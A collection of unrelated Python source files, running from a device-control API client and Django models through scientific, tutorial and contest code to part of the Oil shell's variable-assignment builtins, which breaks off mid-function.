stream = requests.get(self.gps_stream_url, stream=True)
for i in stream.iter_lines():
if i:
self.stream_data = json.loads(i.decode("utf-8"))
except:
print('Error: BlackMothAPI: GPSStream: Unable to start stream')
return 1
class PoEState:
def __init__(self, ip, state):
self.ip_entry_data = ip
self.state_change = state
self.poe_down_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerdown/poe/'
self.poe_up_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerup/poe/'
self.poe_set()
def poe_set(self):
if self.state_change == 'off':
try:
powerdown = requests.get(self.poe_down_url)
print(powerdown)
except:
print('Error: BlackMothAPI: poe_set: powerdown')
elif self.state_change == 'on':
try:
powerup = requests.get(self.poe_up_url)
print(powerup)
except:
print('Error: BlackMothAPI: poe_set: powerup')
else:
print('Error: BlackMothAPI: poe_set: please check IP = str and state = str')
class ScreenState:
def __init__(self, ip, state):
self.ip_entry_data = ip
self.state_change = state
self.screen_down_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerdown/screen/'
self.screen_up_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerup/screen/'
self.screen_set()
def screen_set(self):
if self.state_change == 'off':
try:
powerdown = requests.get(self.screen_down_url)
print(powerdown)
except:
print('Error: BlackMothAPI: screen_set: powerdown')
elif self.state_change == 'on':
try:
powerup = requests.get(self.screen_up_url)
print(powerup)
except:
print('Error: BlackMothAPI: screen_set: powerup')
else:
print('Error: BlackMothAPI: screen_set: please check IP = str and state = str')
class GSMState:
def __init__(self, ip):
self.ip_entry_data = ip
self.interface_url = 'http://' + self.ip_entry_data + ':8080/gsm/interface/'
self.interface_data = ''
self.gsm_get()
def gsm_get(self):
try:
get = requests.get(self.interface_url)
gsm_data = json.loads(get.text)
self.interface_data = gsm_data
except:
print('Error: BlackMothAPI: GSMState: GSM Please check IP = str')
return 1
class FirmwareVersion:
def __init__(self, ip):
self.ip_entry_data = ip
self.version_url = 'http://' + self.ip_entry_data + ':8080/config/version/'
self.version_data = ''
self.version_get()
def version_get(self):
try:
get = requests.get(self.version_url)
self.version_data = json.loads(get.text)
except:
print('Error: BlackMothAPI: FirmwareVersion: Please check IP = str')
return 1
class CameraConf:
def __init__(self, ip):
self.ip_entry_data = ip
self.config_camera_url = 'http://' + str(ip) + ':8080/config/camera/'
self.config_camera_data = ''
def config_camera(self):
try:
get = requests.get(self.config_camera_url)
self.config_camera_data = json.loads(get.text)
except:
print('Error: BlackMothAPI: CameraConf: Please check IP = str')
return 1
class SystemIds:
def __init__(self, ip):
self.ip_entry_data = ip
self.system_ids_url = 'http://' + str(ip) + ':8080/system/ids/'
self.system_ids = ''
self.get_system_ids()
def get_system_ids(self):
try:
get = requests.get(self.system_ids_url)
data = json.loads(get.text)
self.system_ids = data
except:
print('Error: BlackmothAPI: SystemIds: Please check IP = str or Cannot reach: ' + str(self.ip_entry_data))
|
from django.db import models
from apps.web_config import *
#from apps.product.models import Product
# Create your models here.
# 用户登录帐号
class UserAccount(models.Model):
nickname = models.CharField(verbose_name='昵称', max_length=120, unique=True, null=True)
phone = models.CharField(verbose_name='电话号码', max_length=120, unique=True, null=True, blank=True)
email = models.EmailField(verbose_name='邮箱', max_length=250, unique=True, null=True, blank=True)
user_pwd = models.CharField(verbose_name='登录密码', max_length=250)
log_time = models.DateTimeField(verbose_name='登录起始时间', auto_now_add=True)
create_time = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
#(0、无, 1、可用, 2、具备支付能力, 3、用户指数极低 4、不可用)
acc_status = models.IntegerField(verbose_name='帐号状态(num)', default=1)
# 后台菜单、title等显示名称
class Meta:
verbose_name = u"用户帐号"
verbose_name_plural = verbose_name
def __str__(self):
return self.nickname
# 用户信息储存 一对一
class UserMessage(models.Model):
nickname = models.CharField(verbose_name='昵称', max_length=120, unique=True, null=True)
signature = models.CharField(verbose_name='个性签名', max_length=250, default=STR_DEFAULT, null=True, blank=True)
realname = models.CharField(verbose_name='真实姓名', blank=True, max_length=120, null=True, default=STR_NUM_DEFAULT)
face = models.ImageField(verbose_name='头像', upload_to="image/%Y/%m", blank=True, null=True, default=FACE_DEFAULT)
sex = models.CharField(verbose_name='性别',max_length=8, null=True, default=STR_NUM_DEFAULT)
birth = models.DateField(verbose_name='生日', blank=True, auto_now=True)
sf_code = models.CharField(verbose_name='身份证号码', default=STR_NUM_DEFAULT, max_length=8, blank=True, null=True)
is_member = models.NullBooleanField(verbose_name='是否是会员', default=BOOL_NULL_DEFAULT)
#user_account = models.ForeignKey(UserAccount, verbose_name='所属用户', on_delete=models.SET_NULL, blank=True, null=True)
user_account = models.OneToOneField(UserAccount, verbose_name='所属用户', on_delete=models.CASCADE, primary_key=True)
user_id = models.IntegerField(verbose_name='用户id', null=True, blank=True)
# 后台菜单、title等显示名称
class Meta:
verbose_name = u"用户信息"
verbose_name_plural = verbose_name
def __str__(self):
return self.nickname+'用户的资料'
# 用户状态 一对一
class UserStatus(models.Model):
is_18 = models.NullBooleanField(verbose_name='满18岁?', default=BOOL_NULL_DEFAULT, blank=True, null=True)
is_marry = models.NullBooleanField(verbose_name='是否结婚', default=BOOL_NULL_DEFAULT)
is_house = models.NullBooleanField(verbose_name='是否有房', default=BOOL_NULL_DEFAULT)
is_car = models.NullBooleanField(verbose_name='是否有车', default=BOOL_NULL_DEFAULT)
credit_status = models.IntegerField(verbose_name='信誉状况(分)', default=INT_DEFAULT)
is_business = models.NullBooleanField(verbose_name='是否是商家', default=BOOL_NULL_DEFAULT)
is_real = models.NullBooleanField(verbose_name='是否实名认证', default=BOOL_NULL_DEFAULT)
#user_account = models.ForeignKey(UserAccount, verbose_name='所属用户', on_delete=models.SET_NULL, blank=True, null=True)
user_account = models.OneToOneField(UserAccount, verbose_name='所属用户', on_delete=models.CASCADE, primary_key=True)
user_id = models.IntegerField(verbose_name='用户id', null=True, blank=True)
# 后台菜单、title等显示名称
class Meta:
verbose_name = u"用户状态详情"
verbose_name_plural = verbose_name
def __str__(self):
return '用户ID:'+str(self.user_id)+'的状态'
# 用户资金 一对一
class UserMoneyCount(models.Model):
user_account = models.OneToOneField(UserAccount, verbose_name='所属用户', on_delete=models.CASCADE, primary_key=True)
use_money_count = models.DecimalField(verbose_name='在网站消费了多少钱', default=DECIMAL_DEFAULT_ZERO, max_digits=10, decimal_places=2)
product_num = models.IntegerField(verbose_name='已买多少件商品', null=True)
email = models.EmailField(verbose_name='保存的邮箱', max_length=250, unique=True, null=True, blank=True)
create_time = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
data_status = models.IntegerField(verbose_name='数据状态', default=1)
# 后台菜单、title等显示名称
class Meta:
verbose_name = u"用户消费记录"
verbose_name_plural = verbose_name
def __str__(self):
return str(self.email)+'的消费记录'
|
import numpy as np
import datetime
class RSWaveformGenerator():
"""
Generates .wv files from I/Q for the AFQ 100B I/Q modulation generator
and related Rohde & Schwarz instruments
RSWaveformGenerator(instrument)
Initialises waveform generator ready to upload to qcodes instrument
If instrument is not provided, can generate and save .wv files
but not upload to instrument
self.generate_wave(I_data,Q_data,clock,markers)
Generates waveform (R&S .wv format) from input data
I_data must be vector of values in range (-1,1)
Q_data must be vector of values in range (-1,1)
clock is AWG sample rate, from 1kHz to 300MHz, or 600MHz
markers is dict with entries 'marker1','marker2','marker3','marker4'
Not all entries required, can omit uncessary marker lists
Marker lists take form position/value [[0,0],[10,1],[50,0]]
Example:
markers = {}
markers['marker1'] = [[0,0],[10,1],[50,0]]
markers['marker2'] = [[0,1],[50,0]]
markers['marker3'] = [[0,0]]
Marker voltages reset to 0 immediately after all marker waveforms (not IQ waveform) end
self.upload_wave()
Uploads waveform from memory self.waveform to instrument and autoplays
Change self.instrument_directory and self.instrument_filename to change upload location
self.save_wave_file(local_filename)
Saves self.waveform as .wv file to local_filename
self.read_wave_file(local_filename)
Reads contents of .wv file local_filename to self.waveform
self.upload_wave_file(local_filename)
Reads contents of .wv file local_filename to self.waveform
then uploads to instrument and autoplays
"""
def __init__(self,instrument=None):
self.instrument = instrument
self.instrument_directory = 'D:\\TEMP\\'
self.instrument_filename = 'temp.wv'
self.instrument_filepath = 'D:\\TEMP\\temp.wv'
self.comment = ''
self.copyright = ''
self.normalise = False
self.checks = False
self.waveform = None
self.max_samples = 100e6 #512e6 #Device memory 512MSa but generating long waveform is too memory intensive
def generate_wave(self,I_data,Q_data,clock,markers=None):
# Sanity checks
self.waveform = None
I_data_len = len(I_data)
Q_data_len = len(Q_data)
if I_data_len > self.max_samples:
raise ValueError('Number of samples {} exceeds max_samples {}'.format(I_data_len,self.max_samples))
if I_data_len != Q_data_len:
raise ValueError('I_data and Q_data are not same length ({},{})'.format(I_data_len,Q_data_len))
I_data = np.array(I_data,dtype=np.single)
Q_data = np.array(Q_data,dtype=np.single)
# Format I,Q vectors into IQIQIQ...
IQ_data_len = 2*I_data_len
IQ_data = np.empty(IQ_data_len,dtype=np.single)
IQ_data[0::2] = I_data
IQ_data[1::2] = Q_data
# If scaling is desired, normalise to peak vector length of 1.0
if self.normalise:
max_IQ_data = np.max(np.abs( I_data + 1j*Q_data ))
IQ_data = IQ_data / max_IQ_data
peak = 1.0
max_IQ_data = 1.0
rms = np.sqrt(np.mean(np.square(IQ_data[0::2])+np.square(IQ_data[1::2]))) / max_IQ_data
crf = 20*np.log10(peak/rms) # Crest factor
else:
# If not scaling, ought to check for clipping (outside +/-1)
# But this is really memory intensive for large sample lengths
# Particularly the third one
# So I made these optional
if self.checks:
if np.max(I_data) > 1.0 or np.min(I_data) < -1.0:
raise ValueError('I_data must be in range -1 to +1 if auto scaling is disabled.')
if np.max(Q_data) > 1.0 or np.min(Q_data) < -1.0:
raise ValueError('Q_data must be in range -1 to +1 if auto scaling is disabled.')
if np.max(np.abs( I_data + 1j*Q_data )) > 1.0:
raise ValueError('I/Q vector length must be <1 if auto scaling is disabled.')
peak = 1.0
rms = 1.0
crf = 0.0
# Convert IQ_data to int16
# Range is 16 bits for analogue outputs
# +1.0 ---> +32767
# 0.0 ---> 0
# -1.0 ---> -32767
IQ_data = np.floor(IQ_data*32767+0.5).astype(np.int16)
# Generate wv file header and encode to binary
header_tag_str = '{TYPE: SMU-WV, 0}'
comment_str = ('' if self.comment == '' else '{{COMMENT: {}}}'.format(self.comment))
copyright_str = ('' if self.copyright == '' else '{{COPYRIGHT: {}}}'.format(self.copyright))
origin_info_str = '{ORIGIN INFO: Python}' # This field is ignored by the instrument
level_offs_str = '{{LEVEL OFFS: {}, {}}}'.format(20*np.log10(1.0/rms),20*np.log10(1.0/peak))
date_str = '{{DATE: {};{}}}'.format(datetime.datetime.now().isoformat()[0:10],datetime.datetime.now().isoformat()[11:19])
clock_str = '{{CLOCK: {}}}'.format(clock)
samples_str = '{{SAMPLES: {}}}'.format(I_data_len)
waveform_header = '{}{}{}{}{}{}{}{}'.format(header_tag_str,comment_str,copyright_str,origin_info_str,level_offs_str,date_str,clock_str,samples_str).encode('ascii')
# Generate markers
waveform_markers = ''
if markers:
if type(markers) != dict:
raise ValueError("Markers must be dict. Allowed entries are 'marker1','marker2','marker3','marker4'")
waveform_markers += '{{CONTROL LENGTH: {}}}'.format(IQ_data_len)
if 'marker1' in markers:
waveform_markers += '{{MARKER LIST 1: {}}}'.format(self._generate_marker_string(markers['marker1']))
if 'marker2' in markers:
waveform_markers += '{{MARKER LIST 2: {}}}'.format(self._generate_marker_string(markers['marker2']))
if 'marker3' in markers:
waveform_markers += '{{MARKER LIST 3: {}}}'.format(self._generate_marker_string(markers['marker3']))
if 'marker4' in markers:
waveform_markers += '{{MARKER LIST 4: {}}}'.format(self._generate_marker_string(markers['marker4']))
waveform_markers = waveform_markers.encode('ascii')
# Convert IQ_data to bitstring with length header
wv_file_IQ_data_bitstring = '{{WAVEFORM-{}: #'.format(2*IQ_data_len + 1).encode('ascii') + IQ_data.tostring() + '}'.encode('ascii')
# Construct wv binary file in memory
self.waveform = waveform_header + waveform_markers + wv_file_IQ_data_bitstring
print('Waveform generated: {} samples, {} bytes'.format(I_data_len,len(self.waveform)))
#return self.wv_file_bitstring
def upload_wave(self):
if not self.waveform:
raise ValueError('Waveform not generated. Please run generate_wave() or read_wave_file()')
if not self.instrument:
raise ValueError('Instrument not provided. Please call RSWaveformGenerator(instrument)')
self.instrument_filepath = self.instrument_directory + self.instrument_filename
# Calculate binary data block prefix
# Takes form of '#213'
# First number is how many digits subsequent number has
# Second number is number of subsequent bytes
num_bytes = len(self.waveform)
num_digits_bytes = len(str(num_bytes))
binary_prefix = '\',#{}{}'.format(num_digits_bytes,num_bytes)
print('Uploading {} bytes...'.format(num_bytes),end = '')
#SCPI_command = ':SOUR:WAV:DATA \'' + self.instrument_filepath + binary_prefix
SCPI_command = 'MMEM:DATA \'' + self.instrument_filepath + binary_prefix
self.instrument.visa_handle.write_raw(SCPI_command.encode('ascii')+self.waveform)
self.instrument.wvfile(self.instrument_filepath)
print('\rUploaded {} bytes to {}'.format(num_bytes,self.instrument_filepath))
def save_wave_file(self,local_filename):
if not self.waveform:
raise ValueError('Waveform not generated. Please run generate_wave() or read_wave_file()')
with open(local_filename, mode='wb') as wv:
wv.write(self.waveform)
def read_wave_file(self,local_filename):
with open(local_filename, mode='rb') as wv:
self.waveform = wv.read()
def upload_wave_file(self,local_filename):
self.read_wave_file(local_filename)
self.upload_wave()
def _generate_marker_string(self,marker_array):
if np.shape(marker_array)[1] != 2:
raise ValueError('Marker array must be in format [[0,0],[20,1],[50,0]], even if one entry')
marker_string = ''
for point in marker_array:
marker_string += '{}:{};'.format(point[0],point[1])
return marker_string.rstrip(';') |
import logging
log = logging.getLogger(__name__)
import re
import numpy
import itertools
import westpa
from oldtools.aframe import AnalysisMixin
class KineticsAnalysisMixin(AnalysisMixin):
def __init__(self):
super(KineticsAnalysisMixin,self).__init__()
self.dt = None
self.analysis_initial_bins = None
self.analysis_final_bins = None
def add_args(self, parser, upcall = True):
if upcall:
try:
upfunc = super(KineticsAnalysisMixin,self).add_args
except AttributeError:
pass
else:
upfunc(parser)
group = parser.add_argument_group('kinetics analysis options')
group.add_argument('--dt', dest='dt', type=float, default=1.0,
help='Assume input data has a time spacing of DT (default: %(default)s).')
group.add_argument('--initial-bins', dest='ibins_string', metavar='ILIST',
help='''Only calculate statistics for transitions starting in bin ILIST. This may be specified as a
comma-separated list of integers or ranges, as in "0,2-4,5,9"''')
group.add_argument('--final-bins', dest='fbins_string', metavar='FLIST',
help='''Only calculate statistics for transitions ending in bin FLIST. This may be specified as a
comma-separated list of integers or ranges, as in "0,2-4,5,9"''')
def process_args(self, args, upcall = True):
self.dt = args.dt
westpa.rc.pstatus('Assuming input data timestep of {:g}'.format(self.dt))
if args.ibins_string:
self.analysis_initial_bins = self.parse_bin_range(args.ibins_string)
westpa.rc.pstatus('Will calculate kinetics data from transitions beginning in the following bins: {!s}'
.format(sorted(self.analysis_initial_bins)))
else:
westpa.rc.pstatus('Will calculate kinetics data from transitions beginning in any bin.')
if args.fbins_string:
self.analysis_final_bins = self.parse_bin_range(args.fbins_string)
westpa.rc.pstatus('Will calculate kinetics data from transitions ending in the following bins: {!s}'
.format(sorted(self.analysis_final_bins)))
else:
westpa.rc.pstatus('Will calculate kinetics data from transitions ending in any bin.')
if upcall:
try:
upfunc = super(KineticsAnalysisMixin,self).process_args
except AttributeError:
pass
else:
upfunc(args)
def parse_bin_range(self, range_string):
try:
entries = set()
fields = re.split('\s*,\s*', range_string)
for field in fields:
if '-' in field:
lb, ub = list(map(int,re.split('\s*-\s*', field)))
entries.update(list(range(lb,ub+1)))
else:
entries.add(int(field))
except (ValueError,TypeError):
raise ValueError('invalid bin range string {!r}'.format(range_string))
else:
return entries
def check_bin_selection(self, n_bins = None):
'''Check to see that the bin ranges selected by the user conform to the available bins (i.e.,
bin indices are within the permissible range). Also assigns the complete bin range if the
user has not explicitly limited the bins to be considered.'''
n_bins = n_bins or self.n_bins
if self.analysis_initial_bins:
if (numpy.array(list(self.analysis_initial_bins)) >= n_bins).any():
raise ValueError('One or more initial bin indices is out of range.')
else:
self.analysis_initial_bins = set(range(n_bins))
if self.analysis_final_bins:
if (numpy.array(list(self.analysis_final_bins)) >= n_bins).any():
raise ValueError('One or more final bin indices is out of range.')
else:
self.analysis_final_bins = set(range(n_bins))
@property
def selected_bin_pair_iter(self):
return (tuple(pair) for pair in itertools.product(self.analysis_initial_bins,self.analysis_final_bins))
|
"""adds timestamp to posts
Revision ID: 39c16cd10ee8
Revises: 4907810d149c
Create Date: 2021-01-24 06:34:07.126310
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '39c16cd10ee8'
down_revision = '4907810d149c'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('post', schema=None) as batch_op:
batch_op.add_column(sa.Column('timestamp', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('post', schema=None) as batch_op:
batch_op.drop_column('timestamp')
# ### end Alembic commands ###
|
import cv2
import numpy as np
from shapely import affinity
from shapely.geometry import LineString, box
def get_patch_coord(patch_box, patch_angle=0.0):
patch_x, patch_y, patch_h, patch_w = patch_box
x_min = patch_x - patch_w / 2.0
y_min = patch_y - patch_h / 2.0
x_max = patch_x + patch_w / 2.0
y_max = patch_y + patch_h / 2.0
patch = box(x_min, y_min, x_max, y_max)
patch = affinity.rotate(patch, patch_angle, origin=(patch_x, patch_y), use_radians=False)
return patch
def mask_for_lines(lines, mask, thickness, idx):
coords = np.asarray(list(lines.coords), np.int32)
coords = coords.reshape((-1, 2))
cv2.polylines(mask, [coords], False, color=idx, thickness=thickness)
idx += 1
return mask, idx
def line_geom_to_mask(layer_geom, confidence_levels, local_box, canvas_size, thickness, idx):
patch_x, patch_y, patch_h, patch_w = local_box
patch = get_patch_coord(local_box)
canvas_h = canvas_size[0]
canvas_w = canvas_size[1]
scale_height = canvas_h / patch_h
scale_width = canvas_w / patch_w
trans_x = -patch_x + patch_w / 2.0
trans_y = -patch_y + patch_h / 2.0
map_mask = np.zeros(canvas_size, np.uint8)
for line, confidence in layer_geom:
new_line = line.intersection(patch)
if not new_line.is_empty:
new_line = affinity.affine_transform(new_line, [1.0, 0.0, 0.0, 1.0, trans_x, trans_y])
new_line = affinity.scale(new_line, xfact=scale_width, yfact=scale_height, origin=(0, 0))
confidence_levels.append(confidence)
if new_line.geom_type == 'MultiLineString':
for new_single_line in new_line:
map_mask, idx = mask_for_lines(new_single_line, map_mask, idx, thickness)
else:
map_mask, idx = mask_for_lines(new_line, map_mask, idx, thickness)
return map_mask, idx
def rasterize_map(vectors, patch_size, canvas_size, max_channel, thickness):
confidence_levels = [-1]
vector_num_list = {}
for i in range(max_channel + 1):
vector_num_list[i] = []
for vector in vectors:
if vector['pts_num'] >= 2:
vector_num_list[vector['type']].append((LineString(vector['pts'][:vector['pts_num']]), vector.get('confidence_level', 1)))
local_box = (0.0, 0.0, patch_size[0], patch_size[1])
idx = 1
masks = []
for i in range(max_channel):
map_mask, idx = line_geom_to_mask(vector_num_list[i], confidence_levels, local_box, canvas_size, thickness, idx)
masks.append(map_mask)
return np.stack(masks), confidence_levels
|
#Problem ID: CACHEHIT
#Problem Name: Cache Hits
for _ in range(int(input())):
n, b, m = map(int, input().split())
l = list(map(int, input().split()))
c = 1
acc = l[0]//b
for i in range(m):
if l[i]//b != acc:
c+=1
acc = l[i]//b
print(c)
|
def feet_to_inches(feet):
return feet * 12
print("Inches: ", format(feet_to_inches(float(input("Enter number of feet: "))), ",.2f"))
|
alp=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
def valid(parties):
s=sum(parties)
for i in parties:
if i>s/2 or i<0:
return False
return True
def solve(parties):
if valid(parties) and sum(parties)==0:
return []
for k in range(len(parties)):
m=sorted(parties)[-(k+1)]
m=[i for i,j in enumerate(parties) if j==m]
for n in m:
parties[n]-=2
if valid(parties):
tmp=solve(parties)
if tmp!=None:
return [alp[n]*2]+tmp
parties[n]+=2
parties[n]-=1
if valid(parties):
tmp=solve(parties)
if tmp!=None:
return [alp[n]]+tmp
for x in range(len(parties)):
parties[x]-=1
if valid(parties):
tmp=solve(parties)
if tmp!=None:
return [alp[n]+alp[x]]+tmp
parties[x]+=1
parties[n]+=1
return None
t = int(raw_input()) # read a line with a single integer
for i in xrange(1, t + 1):
raw_input()
parties=[int(k) for k in raw_input().split(' ')]
print "Case #"+str(i)+": "+' '.join(solve(parties))
|
# -*- coding: utf-8 -*-
{
'name': 'Dogma Partner Fields',
'version': '13.0.1.4.0',
'author': 'HomebrewSoft',
'website': 'https://github.com/HomebrewSoft/dogma_partner_fields',
'category': 'Operations',
'depends': [
'sms',
],
'data': [
'views/res_partner.xml',
],
}
|
def SalvarArvoreGeradoraMinimaEmArquivo(arquivoDeSaida, arvoreGeradoraMinima):
with open(arquivoDeSaida, 'w') as arquivo:
for aresta in arvoreGeradoraMinima:
arquivo.write('fonte: {}, destino: {}, peso: {}\n'.format(aresta['source'], aresta['target'], aresta['weight']))
print("isso ai") |
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
# Simple Linear Regression : Linear dependency between Salary & Years of Exeperience
# Machine is : Simple Linear Regression Model
# Learning is : We trained our machine model on training set that is we train our model.
# It learns the correlations of the training set to be able to some Future Prediction.
# Importing Dataset
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Splitting dataset into training and testing sets
dataset=pd.read_csv('Salary_Data.csv')
x=dataset.iloc[:, :-1].values
y=dataset.iloc[:, 1].values
# x is matrix and y is vector
# to have same result we are keeping random_state=0
from sklearn.cross_validation import train_test_split
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=1/3,random_state=0)
# in Simple Linear regression Feature scaling is not required as it is care taken by scikit learn libraries.
# Fitting simple linear regression to training set
# LinearRegression is class
from sklearn.linear_model import LinearRegression
# regressor is an Object of the class
regressor =LinearRegression()
# call method as fit
regressor.fit(x_train,y_train)
# fit regressor to training data that is regressor is our Machine learning model
# Predicting Test set result
# y_pred is vector of all dependent variable
y_pred=regressor.predict(x_test)
# y_test is real salary from dataset
#y_pred is predicted salary by ML Model
#Visualisation the training set'
plt.scatter(x_train,y_train,color='red')
plt.plot(x_train,regressor.predict(x_train),color='blue')
plt.title('Salary vrs Experience(treaining set)')
plt.xlabel('Exeperience')
plt.ylabel('Salary')
plt.show()
plt.scatter(x_test,y_test,color='red')
plt.plot(x_train,regressor.predict(x_train),color='blue')
plt.title('Salary vrs Experience(treaining set)')
plt.xlabel('Exeperience')
plt.ylabel('Salary')
plt.show()
|
#!/usr/bin/env python2
"""
builtin_assign.py
"""
from __future__ import print_function
from _devbuild.gen import arg_types
from _devbuild.gen.option_asdl import builtin_i
from _devbuild.gen.runtime_asdl import (
value, value_e, value_t, value__Bool, value__Str, value__MaybeStrArray,
value__AssocArray,
lvalue, scope_e, cmd_value__Argv, cmd_value__Assign, assign_arg,
)
from core import error
from core.pyerror import e_usage, log
from core import state
from core import vm
from frontend import flag_spec
from frontend import args
from mycpp import mylib
from osh import sh_expr_eval
from osh import cmd_eval
from qsn_ import qsn
from typing import cast, Optional, Dict, List, TYPE_CHECKING
if TYPE_CHECKING:
from _devbuild.gen.runtime_asdl import Proc
from core.state import Mem
from core.ui import ErrorFormatter
from frontend.args import _Attributes
_ = log
_OTHER = 0
_READONLY = 1
_EXPORT = 2
def _PrintVariables(mem, cmd_val, attrs, print_flags, builtin=_OTHER):
# type: (Mem, cmd_value__Assign, _Attributes, bool, int) -> int
"""
Args:
print_flags: whether to print flags
builtin: is it the readonly or export builtin?
"""
flag = attrs.attrs
# Turn dynamic vars to static.
tmp_g = flag.get('g')
tmp_a = flag.get('a')
tmp_A = flag.get('A')
flag_g = cast(value__Bool, tmp_g).b if tmp_g and tmp_g.tag_() == value_e.Bool else False
flag_a = cast(value__Bool, tmp_a).b if tmp_a and tmp_a.tag_() == value_e.Bool else False
flag_A = cast(value__Bool, tmp_A).b if tmp_A and tmp_A.tag_() == value_e.Bool else False
tmp_n = flag.get('n')
tmp_r = flag.get('r')
tmp_x = flag.get('x')
#log('FLAG %r', flag)
# SUBTLE: export -n vs. declare -n. flag vs. OPTION.
# flags are value.Bool, while options are Undef or Str.
# '+', '-', or None
flag_n = cast(value__Str, tmp_n).s if tmp_n and tmp_n.tag_() == value_e.Str else None # type: Optional[str]
flag_r = cast(value__Str, tmp_r).s if tmp_r and tmp_r.tag_() == value_e.Str else None # type: Optional[str]
flag_x = cast(value__Str, tmp_x).s if tmp_x and tmp_x.tag_() == value_e.Str else None # type: Optional[str]
if cmd_val.builtin_id == builtin_i.local:
if flag_g and not mem.IsGlobalScope():
return 1
which_scopes = scope_e.LocalOnly
elif flag_g:
which_scopes = scope_e.GlobalOnly
else:
which_scopes = mem.ScopesForReading() # reading
if len(cmd_val.pairs) == 0:
print_all = True
cells = mem.GetAllCells(which_scopes)
names = sorted(cells) # type: List[str]
else:
print_all = False
names = []
cells = {}
for pair in cmd_val.pairs:
name = pair.var_name
if pair.rval and pair.rval.tag_() == value_e.Str:
# Invalid: declare -p foo=bar
# Add a sentinel so we skip it, but know to exit with status 1.
s = cast(value__Str, pair.rval).s
invalid = "%s=%s" % (name, s)
names.append(invalid)
cells[invalid] = None
else:
names.append(name)
cells[name] = mem.GetCell(name, which_scopes)
count = 0
for name in names:
cell = cells[name]
if cell is None: continue # Invalid
val = cell.val
#log('name %r %s', name, val)
if val.tag_() == value_e.Undef: continue
if builtin == _READONLY and not cell.readonly: continue
if builtin == _EXPORT and not cell.exported: continue
if flag_n == '-' and not cell.nameref: continue
if flag_n == '+' and cell.nameref: continue
if flag_r == '-' and not cell.readonly: continue
if flag_r == '+' and cell.readonly: continue
if flag_x == '-' and not cell.exported: continue
if flag_x == '+' and cell.exported: continue
if flag_a and val.tag_() != value_e.MaybeStrArray: continue
if flag_A and val.tag_() != value_e.AssocArray: continue
decl = [] # type: List[str]
if print_flags:
flags = [] # type: List[str]
if cell.nameref: flags.append('n')
if cell.readonly: flags.append('r')
if cell.exported: flags.append('x')
if val.tag_() == value_e.MaybeStrArray:
flags.append('a')
elif val.tag_() == value_e.AssocArray:
flags.append('A')
if len(flags) == 0: flags.append('-')
decl.extend(["declare -", ''.join(flags), " ", name])
else:
decl.append(name)
if val.tag_() == value_e.Str:
str_val = cast(value__Str, val)
decl.extend(["=", qsn.maybe_shell_encode(str_val.s)])
elif val.tag_() == value_e.MaybeStrArray:
array_val = cast(value__MaybeStrArray, val)
# mycpp rewrite: None in array_val.strs
has_holes = False
for s in array_val.strs:
if s is None:
has_holes = True
break
if has_holes:
# Note: Arrays with unset elements are printed in the form:
# declare -p arr=(); arr[3]='' arr[4]='foo' ...
decl.append("=()")
first = True
for i, element in enumerate(array_val.strs):
if element is not None:
if first:
decl.append(";")
first = False
decl.extend([" ", name, "[", str(i), "]=",
qsn.maybe_shell_encode(element)])
else:
body = [] # type: List[str]
for element in array_val.strs:
if len(body) > 0: body.append(" ")
body.append(qsn.maybe_shell_encode(element))
decl.extend(["=(", ''.join(body), ")"])
elif val.tag_() == value_e.AssocArray:
assoc_val = cast(value__AssocArray, val)
body = []
for key in sorted(assoc_val.d):
if len(body) > 0: body.append(" ")
key_quoted = qsn.maybe_shell_encode(key, flags=qsn.MUST_QUOTE)
value_quoted = qsn.maybe_shell_encode(assoc_val.d[key])
body.extend(["[", key_quoted, "]=", value_quoted])
if len(body) > 0:
decl.extend(["=(", ''.join(body), ")"])
else:
pass # note: other types silently ignored
print(''.join(decl))
count += 1
if print_all or count == len(names):
return 0
else:
return 1
def _ExportReadonly(mem, pair, flags):
# type: (Mem, assign_arg, int) -> None
""" For 'export' and 'readonly' to respect += and flags.
Like 'setvar' (scope_e.LocalOnly), unless dynamic scope is on. That is, it
respects shopt --unset dynamic_scope.
Used for assignment builtins, (( a = b )), {fd}>out, ${x=}, etc.
"""
which_scopes = mem.ScopesForWriting()
lval = lvalue.Named(pair.var_name)
if pair.plus_eq:
old_val = sh_expr_eval.OldValue(lval, mem, None) # ignore set -u
# When 'export e+=', then rval is value.Str('')
# When 'export foo', the pair.plus_eq flag is false.
assert pair.rval is not None
val = cmd_eval.PlusEquals(old_val, pair.rval)
else:
# NOTE: when rval is None, only flags are changed
val = pair.rval
mem.SetValue(lval, val, which_scopes, flags=flags)
class Export(vm._AssignBuiltin):
def __init__(self, mem, errfmt):
# type: (Mem, ErrorFormatter) -> None
self.mem = mem
self.errfmt = errfmt
def Run(self, cmd_val):
# type: (cmd_value__Assign) -> int
arg_r = args.Reader(cmd_val.argv, spids=cmd_val.arg_spids)
arg_r.Next()
attrs = flag_spec.Parse('export_', arg_r)
arg = arg_types.export_(attrs.attrs)
#arg = attrs
if arg.f:
e_usage(
"doesn't accept -f because it's dangerous. "
"(The code can usually be restructured with 'source')")
if arg.p or len(cmd_val.pairs) == 0:
return _PrintVariables(self.mem, cmd_val, attrs, True, builtin=_EXPORT)
if arg.n:
for pair in cmd_val.pairs:
if pair.rval is not None:
e_usage("doesn't accept RHS with -n", span_id=pair.spid)
# NOTE: we don't care if it wasn't found, like bash.
self.mem.ClearFlag(pair.var_name, state.ClearExport)
else:
for pair in cmd_val.pairs:
_ExportReadonly(self.mem, pair, state.SetExport)
return 0
def _ReconcileTypes(rval, flag_a, flag_A, span_id):
# type: (Optional[value_t], bool, bool, int) -> value_t
"""Check that -a and -A flags are consistent with RHS.
Special case: () is allowed to mean empty indexed array or empty assoc array
if the context is clear.
Shared between NewVar and Readonly.
"""
if flag_a and rval is not None and rval.tag_() != value_e.MaybeStrArray:
